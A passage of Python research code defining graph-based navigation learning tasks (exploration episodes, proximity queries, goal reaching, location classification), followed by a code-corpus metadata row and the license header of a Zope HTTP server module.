A list of vertex indices corresponding to the path of the exploration.
"""
in_seq_len = self._config.inputs.values()[0].shape[0]
path, _, states, step_outputs = self._env.random_step_sequence(
min_len=in_seq_len)
obs = {modality_type: [] for modality_type in self._config.inputs}
for o in step_outputs:
step_obs, _, done, _ = o
# It is expected that each value of step_obs is a dict of observations,
# whose dimensions are consistent with the config.inputs sizes.
for modality_type in self._config.inputs:
assert modality_type in step_obs, '{}'.format(type(step_obs))
o = step_obs[modality_type]
i = self._config.inputs[modality_type]
assert len(o.shape) == len(i.shape) - 1
for dim_o, dim_i in zip(o.shape, i.shape[1:]):
assert dim_o == dim_i, '{} != {}'.format(dim_o, dim_i)
obs[modality_type].append(o)
if done:
break
if not obs:
return obs, states, path
max_path_len = int(
round(in_seq_len * float(len(path)) / float(len(obs.values()[0]))))
path = path[-max_path_len:]
states = states[-in_seq_len:]
# The above obs is a list of tuples of np,array. Re-format them as tuple of
# np.array, each array containing all observations from all steps.
def regroup(obs, i):
"""Regroups observations.
Args:
obs: a list of tuples of same size. The k-th tuple contains all the
observations from k-th step. Each observation is a numpy array.
i: the index of the observation in each tuple to be grouped.
Returns:
A numpy array of shape config.inputs[i] which contains all i-th
observations from all steps. These are concatenated along the first
dimension. In addition, if the number of observations is different from
the one specified in config.inputs[i].shape[0], then the array is either
padded from front or clipped.
"""
grouped_obs = np.concatenate(
[np.expand_dims(o, axis=0) for o in obs[i]], axis=0)
in_seq_len = self._config.inputs[i].shape[0]
# pylint: disable=unbalanced-tuple-unpacking
grouped_obs, _ = _pad_or_clip_array(
grouped_obs, in_seq_len, is_front_clip=True)
return grouped_obs
all_obs = {i: regroup(obs, i) for i in self._config.inputs}
return all_obs, states, path
def _obs_to_state(self, path, states):
"""Computes mapping between path nodes and states."""
# Generate a numpy array of locations corresponding to the path vertices.
path_coordinates = map(self._env.vertex_to_pose, path)
path_coordinates = np.concatenate(
[np.reshape(p, [1, 2]) for p in path_coordinates])
# The observations are taken along a smoothed trajectory following the path.
# We compute a mapping between the obeservations and the map vertices.
path_to_obs = collections.defaultdict(list)
obs_to_state = []
for i, s in enumerate(states):
location = np.reshape(s[0:2], [1, 2])
index = np.argmin(
np.reshape(
np.sum(np.power(path_coordinates - location, 2), axis=1), [-1]))
index = path[index]
path_to_obs[index].append(i)
obs_to_state.append(index)
return path_to_obs, obs_to_state
def _perturb_state(self, state, noise_var):
"""Perturbes the state.
The location are purturbed using a Gaussian noise with variance
noise_var. The orientation is uniformly sampled.
Args:
state: a numpy array containing an env state (x, y locations).
noise_var: float
Returns:
The perturbed state.
"""
def normal(v, std):
if std > 0:
n = self._rng.normal(0.0, std)
n = min(n, 2.0 * std)
n = max(n, -2.0 * std)
return v + n
else:
return v
state = state.copy()
state[0] = normal(state[0], noise_var)
state[1] = normal(state[1], noise_var)
if state.size > 2:
state[2] = self._rng.uniform(-math.pi, math.pi)
return state
def _sample_obs(self,
indices,
observations,
observation_states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True):
"""Samples one observation which corresponds to vertex_index in path.
In addition, the sampled observation must have index in observations less
than max_obs_index. If these two conditions cannot be satisfied the
function returns None.
Args:
indices: a list of integers.
observations: a list of numpy arrays containing all the observations.
observation_states: a list of numpy arrays, each array representing the
state of the observation.
path_to_obs: a dict of path indices to lists of observation indices.
max_obs_index: an integer.
use_exploration_obs: if True, then the observation is sampled among the
specified observations, otherwise it is obtained from the environment.
Returns:
A tuple of:
-- A numpy array of size width x height x 3 representing the sampled
observation.
-- The index of the sampld observation among the input observations.
-- The state at which the observation is captured.
Raises:
ValueError: if the observation and observation_states lists are of
different lengths.
"""
if len(observations) != len(observation_states):
raise ValueError('observation and observation_states lists must have '
'equal lengths')
if not indices:
return None, None, None
vertex_index = self._rng.choice(indices)
if use_exploration_obs:
obs_indices = path_to_obs[vertex_index]
if max_obs_index is not None:
obs_indices = [i for i in obs_indices if i < max_obs_index]
if obs_indices:
index = self._rng.choice(obs_indices)
if self._add_query_noise:
xytheta = self._perturb_state(observation_states[index],
self._query_noise_var)
return self._env.observation(xytheta), index, xytheta
else:
return observations[index], index, observation_states[index]
else:
return None, None, None
else:
xy = self._env.vertex_to_pose(vertex_index)
xytheta = np.array([xy[0], xy[1], 0.0])
xytheta = self._perturb_state(xytheta, self._query_noise_var)
return self._env.observation(xytheta), None, xytheta
class AreNearbyTask(RandomExplorationBasedTask):
"""A task of identifying whether a query is nearby current location or not.
The query is guaranteed to be in proximity of an already visited location,
i.e. close to one of the observations. For each observation we have one
query, which is either close or not to this observation.
"""
def __init__(
self,
max_distance=0,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
super(AreNearbyTask, self).__init__(*args, **kwargs)
self._max_distance = max_distance
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
"""Episode data.
Returns:
observations: a tuple with one element. This element is a numpy array of
size in_seq_len x observation_size x observation_size x 3 containing
in_seq_len images.
query: a numpy array of size
in_seq_len x observation_size X observation_size x 3 containing a query
image.
A tuple of size two. First element is a in_seq_len x 2 numpy array of
either 1.0 or 0.0. The i-th element denotes whether the i-th query
image is neraby (value 1.0) or not (value 0.0) to the i-th observation.
The second element in the tuple is a mask, a numpy array of size
in_seq_len x 1 and values 1.0 or 0.0 denoting whether the query is
valid or not (it can happen that the query is not valid, e.g. there are
not enough observations to have a meaningful queries).
"""
observations, states, path = self._exploration()
assert len(observations.values()[0]) == len(states)
# The observations are taken along a smoothed trajectory following the path.
# We compute a mapping between the obeservations and the map vertices.
path_to_obs, obs_to_path = self._obs_to_state(path, states)
# Go over all observations, and sample a query. With probability 0.5 this
# query is a nearby observation (defined as belonging to the same vertex
# in path).
g = self._env.graph
queries = []
labels = []
validity_masks = []
query_index_in_observations = []
for i, curr_o in enumerate(observations.values()[0]):
p = obs_to_path[i]
low = max(0, i - self._max_distance)
# A list of lists of vertex indices. Each list in this group corresponds
# to one possible label.
index_groups = [[], [], []]
# Nearby visited indices, label 1.
nearby_visited = [
ii for ii in path[low:i + 1] + g[p].keys() if ii in obs_to_path[:i]
]
nearby_visited = [ii for ii in index_groups[1] if ii in path_to_obs]
# NOT Nearby visited indices, label 0.
not_nearby_visited = [ii for ii in path[:low] if ii not in g[p].keys()]
not_nearby_visited = [ii for ii in index_groups[0] if ii in path_to_obs]
# NOT visited indices, label 2.
not_visited = [
ii for ii in range(g.number_of_nodes()) if ii not in path[:i + 1]
]
index_groups = [not_nearby_visited, nearby_visited, not_visited]
# Consider only labels for which there are indices.
allowed_labels = [ii for ii, group in enumerate(index_groups) if group]
label = self._rng.choice(allowed_labels)
indices = list(set(index_groups[label]))
max_obs_index = None if label == 2 else i
use_exploration_obs = False if label == 2 else True
o, obs_index, _ = self._sample_obs(
indices=indices,
observations=observations.values()[0],
observation_states=states,
path_to_obs=path_to_obs,
max_obs_index=max_obs_index,
use_exploration_obs=use_exploration_obs)
query_index_in_observations.append(obs_index)
# If we cannot sample a valid query, we mark it as not valid in mask.
if o is None:
label = 0.0
o = curr_o
validity_masks.append(0)
else:
validity_masks.append(1)
queries.append(o.values()[0])
labels.append(label)
query = np.concatenate([np.expand_dims(q, axis=0) for q in queries], axis=0)
def one_hot(label, num_labels=3):
a = np.zeros((num_labels,), dtype=np.float)
a[int(label)] = 1.0
return a
outputs = np.stack([one_hot(l) for l in labels], axis=0)
validity_mask = np.reshape(
np.array(validity_masks, dtype=np.int32), [-1, 1])
self.info['query_index_in_observations'] = query_index_in_observations
self.info['observation_states'] = states
return observations, query, (outputs, validity_mask)
def target_loss(self, truth, predicted, weights=None):
pass
class NeighboringQueriesTask(RandomExplorationBasedTask):
"""A task of identifying whether two queries are closeby or not.
The proximity between queries is defined by the length of the shorest path
between them.
"""
def __init__(
self,
max_distance=1,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
"""Initializes a NeighboringQueriesTask.
Args:
max_distance: integer, the maximum distance in terms of number of vertices
between the two queries, so that they are considered neighboring.
*args: for super class.
**kwargs: for super class.
"""
super(NeighboringQueriesTask, self).__init__(*args, **kwargs)
self._max_distance = max_distance
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
"""Episode data.
Returns:
observations: a tuple with one element. This element is a numpy array of
size in_seq_len x observation_size x observation_size x 3 containing
in_seq_len images.
query: a numpy array of size
2 x observation_size X observation_size x 3 containing a pair of query
images.
A tuple of size two. First element is a numpy array of size 2 containing
a one hot vector of whether the two observations are neighobring. Second
element is a boolean numpy value denoting whether this is a valid
episode.
"""
observations, states, path = self._exploration()
assert len(observations.values()[0]) == len(states)
path_to_obs, _ = self._obs_to_state(path, states)
# Restrict path to ones for which observations have been generated.
path = [p for p in path if p in path_to_obs]
# Sample first query.
query1_index = self._rng.choice(path)
# Sample label.
label = self._rng.randint(2)
# Sample second query.
# If label == 1, then second query must be nearby, otherwise not.
closest_indices = nx.single_source_shortest_path(
self._env.graph, query1_index, self._max_distance).keys()
if label == 0:
# Closest indices on the path.
indices = [p for p in path if p not in closest_indices]
else:
# Indices which are not closest on the path.
indices = [p for p in closest_indices if p in path]
query2_index = self._rng.choice(indices)
# Generate an observation.
query1, query1_index, _ = self._sample_obs(
[query1_index],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True)
query2, query2_index, _ = self._sample_obs(
[query2_index],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=True)
queries = np.concatenate(
[np.expand_dims(q, axis=0) for q in [query1, query2]])
labels = np.array([0, 0])
labels[label] = 1
is_valid = np.array([1])
self.info['observation_states'] = states
self.info['query_indices_in_observations'] = [query1_index, query2_index]
return observations, queries, (labels, is_valid)
def target_loss(self, truth, predicted, weights=None):
pass
#@gin.configurable
class GotoStaticXTask(RandomExplorationBasedTask):
"""Task go to a static X.
If continuous reward is used only one goal is allowed so that the reward can
be computed as a delta-distance to that goal..
"""
def __init__(self,
step_reward=0.0,
goal_reward=1.0,
hit_wall_reward=-1.0,
done_at_target=False,
use_continuous_reward=False,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
super(GotoStaticXTask, self).__init__(*args, **kwargs)
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
self._step_reward = step_reward
self._goal_reward = goal_reward
self._hit_wall_reward = hit_wall_reward
self._done_at_target = done_at_target
self._use_continuous_reward = use_continuous_reward
self._previous_path_length = None
def episode(self):
observations, _, path = self._exploration()
if len(path) < 2:
raise ValueError('The exploration path has only one node.')
g = self._env.graph
start = path[-1]
while True:
goal = self._rng.choice(path[:-1])
if goal != start:
break
goal_path = nx.shortest_path(g, start, goal)
init_orientation = self._rng.uniform(0, np.pi, (1,))
trajectory = np.array(
[list(self._env.vertex_to_pose(p)) for p in goal_path])
init_xy = np.reshape(trajectory[0, :], [-1])
init_state = np.concatenate([init_xy, init_orientation], 0)
trajectory = trajectory[1:, :]
deltas = envs_util.trajectory_to_deltas(trajectory, init_state)
output_seq_len = self._config.output.shape[0]
arr = _pad_or_clip_array(deltas, output_seq_len, output_mask=True)
# pylint: disable=unbalanced-tuple-unpacking
thetas, _, thetas_mask = arr
query = self._env.observation(self._env.vertex_to_pose(goal)).values()[0]
return observations, query, (thetas, thetas_mask)
def reward(self, obs, done, info):
if 'wall_collision' in info and info['wall_collision']:
return obs, self._hit_wall_reward, done, info
reward = 0.0
current_vertex = self._env.pose_to_vertex(self._env.state)
if current_vertex in self._env.targets():
if self._done_at_target:
done = True
else:
obs = self._env.reset()
reward = self._goal_reward
else:
if self._use_continuous_reward:
if len(self._env.targets()) != 1:
raise ValueError(
'FindX task with continuous reward is assuming only one target.')
goal_vertex = self._env.targets()[0]
path_length = self._compute_path_length(goal_vertex)
reward = self._previous_path_length - path_length
self._previous_path_length = path_length
else:
reward = self._step_reward
return obs, reward, done, info
def _compute_path_length(self, goal_vertex):
current_vertex = self._env.pose_to_vertex(self._env.state)
path = nx.shortest_path(self._env.graph, current_vertex, goal_vertex)
assert len(path) >= 2
curr_xy = np.array(self._env.state[:2])
next_xy = np.array(self._env.vertex_to_pose(path[1]))
last_step_distance = np.linalg.norm(next_xy - curr_xy)
return (len(path) - 2) * self._env.cell_size_px + last_step_distance
def reset(self, observation):
if self._use_continuous_reward:
if len(self._env.targets()) != 1:
raise ValueError(
'FindX task with continuous reward is assuming only one target.')
goal_vertex = self._env.targets()[0]
self._previous_path_length = self._compute_path_length(goal_vertex)
def target_loss(self, truth, predicted, weights=None):
"""Action classification loss.
Args:
truth: a batch_size x sequence length x number of labels float
Tensor containing a one hot vector for each label in each batch and
time.
predicted: a batch_size x sequence length x number of labels float
Tensor containing a predicted distribution over all actions.
weights: a batch_size x sequence_length float Tensor of bool
denoting which actions are valid.
Returns:
An average cross entropy over all batches and elements in sequence.
"""
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class RelativeLocationTask(RandomExplorationBasedTask):
"""A task of estimating the relative location of a query w.r.t current.
It is to be used for debugging. It is designed such that the output is a
single value, out of a discrete set of values, so that it can be phrased as
a classification problem.
"""
def __init__(self, num_labels, *args, **kwargs):
"""Initializes a relative location task.
Args:
num_labels: integer, number of orientations to bin the relative
orientation into.
*args: see super class.
**kwargs: see super class.
"""
super(RelativeLocationTask, self).__init__(*args, **kwargs)
self._num_labels = num_labels
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
observations, states, path = self._exploration()
# Select a random element from history.
path_to_obs, _ = self._obs_to_state(path, states)
use_exploration_obs = not self._add_query_noise
query, _, query_state = self._sample_obs(
path[:-1],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=use_exploration_obs)
x, y, theta = tuple(states[-1])
q_x, q_y, _ = tuple(query_state)
t_x, t_y = q_x - x, q_y - y
(rt_x, rt_y) = (np.sin(theta) * t_x - np.cos(theta) * t_y,
np.cos(theta) * t_x + np.sin(theta) * t_y)
# Bins are [a(i), a(i+1)] for a(i) = -pi + 0.5 * bin_size + i * bin_size.
shift = np.pi * (1 - 1.0 / (2.0 * self._num_labels))
orientation = np.arctan2(rt_y, rt_x) + shift
if orientation < 0:
orientation += 2 * np.pi
label = int(np.floor(self._num_labels * orientation / (2 * np.pi)))
out_shape = self._config.output.shape
if len(out_shape) != 1:
raise ValueError('Output shape should be of rank 1.')
if out_shape[0] != self._num_labels:
raise ValueError('Output shape must be of size %d' % self._num_labels)
output = np.zeros(out_shape, dtype=np.float32)
output[label] = 1
return observations, query, (output, None)
def target_loss(self, truth, predicted, weights=None):
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class LocationClassificationTask(UnrolledTask):
"""A task of classifying a location as one of several classes.
The task does not have an input, but just a query and an output. The query
is an observation of the current location, e.g. an image taken from the
current state. The output is a label classifying this location in one of
predefined set of locations (or landmarks).
The current implementation classifies locations as intersections based on the
number and directions of biforcations. It is expected that a location can have
at most 4 different directions, aligned with the axes. As each of these four
directions might be present or not, the number of possible intersections are
2^4 = 16.
"""
def __init__(self, env, seed, *args, **kwargs):
super(LocationClassificationTask, self).__init__(*args, **kwargs)
self._env = env
self._rng = np.random.RandomState(seed)
# A location property which can be set. If not set, a random one is
# generated.
self._location = None
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
@property
def location(self):
return self._location
@location.setter
def location(self, location):
self._location = location
def episode(self):
# Get a location. If not set, sample on at a vertex with a random
# orientation
location = self._location
if location is None:
num_nodes = self._env.graph.number_of_nodes()
vertex = int(math.floor(self._rng.uniform(0, num_nodes)))
xy = self._env.vertex_to_pose(vertex)
theta = self._rng.uniform(0, 2 * math.pi)
location = np.concatenate(
[np.reshape(xy, [-1]), np.array([theta])], axis=0)
else:
vertex = self._env.pose_to_vertex(location)
theta = location[2]
neighbors = self._env.graph.neighbors(vertex)
xy_s = [self._env.vertex_to_pose(n) for n in neighbors]
def rotate(xy, theta):
"""Rotates a vector around the origin by angle theta.
Args:
xy: a numpy darray of shape (2, ) of floats containing the x and y
coordinates of a vector.
theta: a python float containing the rotation angle in radians.
Returns:
A numpy darray of floats of shape (2,) containing the x and y
coordinates rotated xy.
"""
rotated_x = np.cos(theta) * xy[0] - np.sin(theta) * xy[1]
rotated_y = np.sin(theta) * xy[0] + np.cos(theta) * xy[1]
return np.array([rotated_x, rotated_y])
# Rotate all intersection biforcation by the orientation of the agent as the
# intersection label is defined in an agent centered fashion.
xy_s = [
rotate(xy - location[0:2], -location[2] - math.pi / 4) for xy in xy_s
]
th_s = [np.arctan2(xy[1], xy[0]) for xy in xy_s]
out_shape = self._config.output.shape
if len(out_shape) != 1:
raise ValueError('Output shape should be of rank 1.')
num_labels = out_shape[0]
if num_labels != 16:
raise ValueError('Currently only 16 labels are supported '
'(there are 16 different 4 way intersection types).')
th_s = set([int(math.floor(4 * (th / (2 * np.pi) + 0.5))) for th in th_s])
one_hot_label = np.zeros((num_labels,), dtype=np.float32)
label = 0
for th in th_s:
label += pow(2, th)
one_hot_label[int(label)] = 1.0
query = self._env.observation(location).values()[0]
return [], query, (one_hot_label, None)
def reward(self, obs, done, info):
raise ValueError('Do not call.')
def target_loss(self, truth, predicted, weights=None):
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class GotoStaticXNoExplorationTask(UnrolledTask):
"""An interface for findX tasks without exploration.
The agent is initialized a random location in a random world and a random goal
and the objective is for the agent to move toward the goal. This class
generates episode for such task. Each generates a sequence of observations x
and target outputs y. x is the observations and is an OrderedDict with keys
provided from config.inputs.keys() and the shapes provided in the
config.inputs. The output is a numpy arrays with the shape specified in the
config.output. The shape of the array is (sequence_length x action_size) where
action is the number of actions that can be done in the environment. Note that
config.output.shape should be set according to the number of actions that can
be done in the env.
target outputs y are the groundtruth value of each action that is computed
from the environment graph. The target output for each action is proportional
to the progress that each action makes. Target value of 1 means that the
action takes the agent one step closer, -1 means the action takes the agent
one step farther. Value of -2 means that action should not take place at all.
This can be because the action leads to collision or it wants to terminate the
episode prematurely.
"""
def __init__(self, env, *args, **kwargs):
super(GotoStaticXNoExplorationTask, self).__init__(*args, **kwargs)
if self._config.query is not None:
raise ValueError('query should be None.')
if len(self._config.output.shape) != 2:
raise ValueError('output should only have two dimensions:'
'(sequence_length x number_of_actions)')
for input_config in self._config.inputs.values():
if input_config.shape[0] != self._config.output.shape[0]:
raise ValueError('the first dimension of the input and output should'
'be the same.')
if len(self._config.output.shape) != 2:
raise ValueError('output shape should be '
'(sequence_length x number_of_actions)')
self._env = env
def _compute_shortest_path_length(self, vertex, target_vertices):
"""Computes length of the shortest path from vertex to any target vertexes.
Args:
vertex: integer, index of the vertex in the environment graph.
target_vertices: list of the target vertexes
Returns:
integer, minimum distance from the vertex to any of the target_vertices.
Raises:
ValueError: if there is no path between the vertex and at least one of
the target_vertices.
"""
try:
return np.min([
len(nx.shortest_path(self._env.graph, vertex, t))
for t in target_vertices
])
except:
#logging.error('there is no path between vertex %d and at least one of '
# 'the targets %r', vertex, target_vertices)
raise
def _compute_gt_value(self, vertex, target_vertices):
"""Computes groundtruth value of all the actions at the vertex.
The value of each action is the difference each action makes in the length
of the shortest path to the goal. If an action takes the agent one step
closer to the goal the value is 1. In case, it takes the agent one step away
from the goal it would be -1. If it leads to collision or if the agent uses
action stop before reaching to the goal it is -2. To avoid scale issues the
gt_values are multipled by 0.5.
Args:
vertex: integer, the index of current vertex.
target_vertices: list of the integer indexes of the target views.
Returns:
numpy array with shape (action_size,) and each element is the groundtruth
value of each action based on the progress each action makes.
"""
action_size = self._config.output.shape[1]
output_value = np.ones((action_size), dtype=np.float32) * -2
my_distance = self._compute_shortest_path_length(vertex, target_vertices)
for adj in self._env.graph[vertex]:
adj_distance = self._compute_shortest_path_length(adj, target_vertices)
if adj_distance is None:
continue
action_index = self._env.action(
self._env.vertex_to_pose(vertex), self._env.vertex_to_pose(adj))
assert action_index is not None, ('{} is not adjacent to {}. There might '
'be a problem in environment graph '
'connectivity because there is no '
'direct edge between the given '
'vertices').format(
self._env.vertex_to_pose(vertex),
self._env.vertex_to_pose(adj))
output_value[action_index] = my_distance - adj_distance
return output_value * 0.5
def episode(self):
"""Returns data needed to train and test a single episode.
Returns:
(inputs, None, output) where inputs is a dictionary of modality types to
numpy arrays. The second element is query but we assume that the goal
is also given as part of observation so it should be None for this task,
and the outputs is the tuple of ground truth action values with the
shape of (sequence_length x action_size) that is coming from
config.output.shape and a numpy array with the shape of
(sequence_length,) that is 1 if the corresponding element of the
input and output should be used in the training optimization.
Raises:
ValueError: If the output values for env.random_step_sequence is not
valid.
ValueError: If the shape of observations coming from the env is not
consistent with the config.
ValueError: If there is a modality type specified in the config but the
environment does not return that.
"""
# Sequence length is the first dimension of any of the input tensors.
sequence_length = self._config.inputs.values()[0].shape[0]
modality_types = self._config.inputs.keys()
path, _, _, step_outputs = self._env.random_step_sequence(
max_len=sequence_length)
target_vertices = [self._env.pose_to_vertex(x) for x in self._env.targets()]
if len(path) != len(step_outputs):
raise ValueError('path, and step_outputs should have equal length'
' {}!={}'.format(len(path), len(step_outputs)))
# Building up observations. observations will be a OrderedDict of
# modality types. The values are numpy arrays that follow the given shape
# in the input config for each modality type.
observations = collections.OrderedDict([k, []] for k in modality_types)
for step_output in step_outputs:
obs_dict = step_output[0]
# Only going over the modality types that are specified in the input
# config.
for modality_type in modality_types:
if modality_type not in obs_dict:
raise ValueError('modality type is not returned from the environment.'
'{} not in {}'.format(modality_type,
obs_dict.keys()))
obs = obs_dict[modality_type]
if np.any(
obs.shape != tuple(self._config.inputs[modality_type].shape[1:])):
raise ValueError(
'The observations should have the same size as speicifed in'
'config for modality type {}. {} != {}'.format(
modality_type, obs.shape,
self._config.inputs[modality_type].shape[1:]))
observations[modality_type].append(obs)
gt_value = [self._compute_gt_value(v, target_vertices) for v in path]
# pylint: disable=unbalanced-tuple-unpacking
gt_value, _, value_mask = _pad_or_clip_array(
np.array(gt_value),
sequence_length,
is_front_clip=False,
output_mask=True,
)
for modality_type, obs in observations.iteritems():
observations[modality_type], _, mask = _pad_or_clip_array(
np.array(obs), sequence_length, is_front_clip=False, output_mask=True)
assert np.all(mask == value_mask)
return observations, None, (gt_value, value_mask)
def reset(self, observation):
"""Called after the environment is reset."""
pass
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
This loss measures the discrepancy between the task outputs, the true and
predicted ones.
Args:
true_targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
weights: tf.Tensor of tf.bool with the shape of
(batch_size x sequence_length).
Raises:
ValueError: if the shapes of the input tensors are not consistent.
Returns:
L2 loss between the predicted action values and true action values.
"""
targets_shape = targets.get_shape().as_list()
true_targets_shape = true_targets.get_shape().as_list()
if len(targets_shape) != 3 or len(true_targets_shape) != 3:
raise ValueError('invalid shape for targets or true_targets_shape')
if np.any(targets_shape != true_targets_shape):
raise ValueError('the shape of targets and true_targets are not the same'
'{} != {}'.format(targets_shape, true_targets_shape))
if weights is not None:
# Filtering targets and true_targets using weights.
weights_shape = weights.get_shape().as_list()
if np.any(weights_shape != targets_shape[0:2]):
raise ValueError('The first two elements of weights shape should match'
'target. {} != {}'.format(weights_shape,
targets_shape))
true_targets = tf.boolean_mask(true_targets, weights)
targets = tf.boolean_mask(targets, weights)
return tf.losses.mean_squared_error(tf.reshape(targets, [-1]),
tf.reshape(true_targets, [-1]))
def reward(self, obs, done, info):
raise NotImplementedError('reward is not implemented for this task')
################################################################################
class NewTask(UnrolledTask):
def __init__(self, env, *args, **kwargs):
super(NewTask, self).__init__(*args, **kwargs)
self._env = env
def _compute_shortest_path_length(self, vertex, target_vertices):
"""Computes length of the shortest path from vertex to any target vertexes.
Args:
vertex: integer, index of the vertex in the environment graph.
target_vertices: list of the target vertexes
Returns:
integer, minimum distance from the vertex to any of the target_vertices.
Raises:
ValueError: if there is no path between the vertex and at least one of
the target_vertices.
"""
try:
return np.min([
len(nx.shortest_path(self._env.graph, vertex, t))
for t in target_vertices
])
except:
logging.error('there is no path between vertex %d and at least one of '
'the targets %r', vertex, target_vertices)
raise
def _compute_gt_value(self, vertex, target_vertices):
"""Computes groundtruth value of all the actions at the vertex.
The value of each action is the difference each action makes in the length
of the shortest path to the goal. If an action takes the agent one step
closer to the goal the value is 1. In case, it takes the agent one step away
from the goal it would be -1. If it leads to collision or if the agent uses
action stop before reaching to the goal it is -2. To avoid scale issues the
gt_values are multipled by 0.5.
Args:
vertex: integer, the index of current vertex.
target_vertices: list of the integer indexes of the target views.
Returns:
numpy array with shape (action_size,) and each element is the groundtruth
value of each action based on the progress each action makes.
"""
action_size = self._config.output.shape[1]
output_value = np.ones((action_size), dtype=np.float32) * -2
# own compute _compute_shortest_path_length - returnts float
my_distance = self._compute_shortest_path_length(vertex, target_vertices)
for adj in self._env.graph[vertex]:
adj_distance = self._compute_shortest_path_length(adj, target_vertices)
if adj_distance is None:
continue
action_index = self._env.action(
self._env.vertex_to_pose(vertex), self._env.vertex_to_pose(adj))
assert action_index is not None, ('{} is not adjacent to {}. There might '
'be a problem in environment graph '
'connectivity because there is no '
'direct edge between the given '
'vertices').format(
self._env.vertex_to_pose(vertex),
self._env.vertex_to_pose(adj))
output_value[action_index] = my_distance - adj_distance
return output_value * 0.5
def episode(self):
"""Returns data needed to train and test a single episode.
Returns:
(inputs, None, output) where inputs is a dictionary of modality types to
numpy arrays. The second element is query but we assume that the goal
is also given as part of observation so it should be None for this task,
and the outputs is the tuple of ground truth action values with the
shape of (sequence_length x action_size) that is coming from
config.output.shape and a numpy array with the shape of
(sequence_length,) that is 1 if the corresponding element of the
input and output should be used in the training optimization.
Raises:
ValueError: If the output values for env.random_step_sequence is not
valid.
ValueError: If the shape of observations coming from the env is not
consistent with the config.
ValueError: If there is a modality type specified in the config but the
environment does not return that.
"""
# Sequence length is the first dimension of any of the input tensors.
sequence_length = self._config.inputs.values()[0].shape[0]
modality_types = self._config.inputs.keys()
path, _, _, step_outputs = self._env.random_step_sequence(
max_len=sequence_length)
target_vertices = [self._env.pose_to_vertex(x) for x in self._env.targets()]
if len(path) != len(step_outputs):
raise ValueError('path, and step_outputs should have equal length'
' {}!={}'.format(len(path), len(step_outputs)))
# Building up observations. observations will be a OrderedDict of
# modality types. The values are numpy arrays that follow the given shape
# in the input config for each modality type.
observations = collections.OrderedDict([k, []] for k in modality_types)
for step_output in step_outputs:
obs_dict = step_output[0]
# Only going over the modality types that are specified in the input
# config.
for modality_type in modality_types:
if modality_type not in obs_dict:
raise ValueError('modality type is not returned from the environment.'
'{} not in {}'.format(modality_type,
obs_dict.keys()))
obs = obs_dict[modality_type]
if np.any(
obs.shape != tuple(self._config.inputs[modality_type].shape[1:])):
raise ValueError(
'The observations should have the same size as speicifed in'
'config for modality type {}. {} != {}'.format(
modality_type, obs.shape,
self._config.inputs[modality_type].shape[1:]))
observations[modality_type].append(obs)
gt_value = [self._compute_gt_value(v, target_vertices) for v in path]
# pylint: disable=unbalanced-tuple-unpacking
gt_value, _, value_mask = _pad_or_clip_array(
np.array(gt_value),
sequence_length,
is_front_clip=False,
output_mask=True,
)
for modality_type, obs in observations.iteritems():
observations[modality_type], _, mask = _pad_or_clip_array(
np.array(obs), sequence_length, is_front_clip=False, output_mask=True)
assert np.all(mask == value_mask)
return observations, None, (gt_value, value_mask)
def reset(self, observation):
"""Called after the environment is reset."""
pass
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
This loss measures the discrepancy between the task outputs, the true and
predicted ones.
Args:
true_targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
weights: tf.Tensor of tf.bool with the shape of
(batch_size x sequence_length).
Raises:
ValueError: if the shapes of the input tensors are not consistent.
Returns:
L2 loss between the predicted action values and true action values.
"""
targets_shape = targets.get_shape().as_list()
true_targets_shape = true_targets.get_shape().as_list()
if len(targets_shape) != 3 or len(true_targets_shape) != 3:
raise ValueError('invalid shape for targets or true_targets_shape')
if np.any(targets_shape != true_targets_shape):
raise ValueError('the shape of targets and true_targets are not the same'
'{} != {}'.format(targets_shape, true_targets_shape))
if weights is not None:
# Filtering targets and true_targets using weights.
weights_shape = weights.get_shape().as_list()
if np.any(weights_shape != targets_shape[0:2]):
raise ValueError('The first two elements of weights shape should match'
'target. {} != {}'.format(weights_shape,
targets_shape))
true_targets = tf.boolean_mask(true_targets, weights)
targets = tf.boolean_mask(targets, weights)
return tf.losses.mean_squared_error(tf.reshape(targets, [-1]),
tf.reshape(true_targets, [-1]))
def reward(self, obs, done, info):
raise NotImplementedError('reward is not implemented for this task')
| apache-2.0 | 4,448,068,774,327,045,000 | 38.465826 | 80 | 0.646759 | false |
Donkyhotay/MoonPy | zope/server/http/publisherhttpserver.py | 1 | 2732 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""HTTP Server that uses the Zope Publisher for executing a task.
$Id: publisherhttpserver.py 39058 2005-10-11 18:31:25Z philikon $
"""
